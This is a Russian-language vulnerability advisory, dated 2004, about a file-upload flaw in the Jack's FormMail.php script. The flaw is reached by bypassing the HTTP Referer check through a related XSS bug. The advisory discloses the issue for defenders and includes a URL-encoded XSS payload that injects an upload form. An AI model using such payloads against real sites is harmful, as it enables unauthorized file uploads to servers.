Дата публикации: | 11.02.2004 |
Всего просмотров: | 2609 |
Опасность: | Критическая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Jack's FormMail.php
Описание: Уязвимость обнаружена в Jack's FormMail.php сценарии. Удаленный пользователь может загружать файлы на целевую систему. Удаленный пользователь может обойти ограничения доступа по HTTP Referer, чтобы загрузить файл на целевую систему. Для этого, удаленный пользователь должен эксплуатировать связанную уязвимость (типа XSS): http://[target]/foo.php?css=<form%20method=post%20e nctype=multipart/form-data% 20action=formmail.php><input%20type=hidden%20name=MAX_FILE_SIZ l><input%20type=file%20name=file%20><input%20type=hidden%20name=recipient%20%20 value=%20foo@foo.com%20><input%20type=submit> URL производителя: http://www.dtheatre.com/scripts/formmail Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | formmail (PHP) Upload file using CSS |